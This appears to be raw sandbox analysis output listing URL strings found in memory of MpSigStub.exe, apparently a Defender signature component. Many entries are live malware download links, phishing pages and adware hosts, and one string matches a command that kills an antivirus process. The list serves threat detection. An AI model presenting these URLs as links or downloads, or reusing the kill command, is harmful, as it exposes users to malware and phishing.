Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com.br
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.googleledal.com/traff1/go.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.haibugmm.com/ba/yfctbzla
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotelelun.cl/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/ajdddsdiocsjcjosdj
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.jejuseongahn.org/hboard4/data/cheditor/badu/alpha.php?v
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%s
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%sx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000024.00000003.6273173989.00000197A4452000.00000004.00000001.sdmp String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://www.maicaidao.com
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.meetchina.net/lib/html/index.php
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.my8899.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.mymediacenter.in/crime/index.php
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.namu-in.com//bbs/data/init.htm
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.natwest.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://www.naver.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.nerddogueto.com.br
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.niepicowane.pl/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.norton-kaspersky.com/trf/tools
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.o2.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.pasillorosa.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-tune.ch/getip.php
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://www.pdefender2009.com/buy.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.powerdomein.nl/nld/administrator/backups/firewallc.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.pp1234.net/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.profilestylez.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.prostol.com/m.html
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.rezababy.blogfa.com
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.sacbarao.kinghost.net/
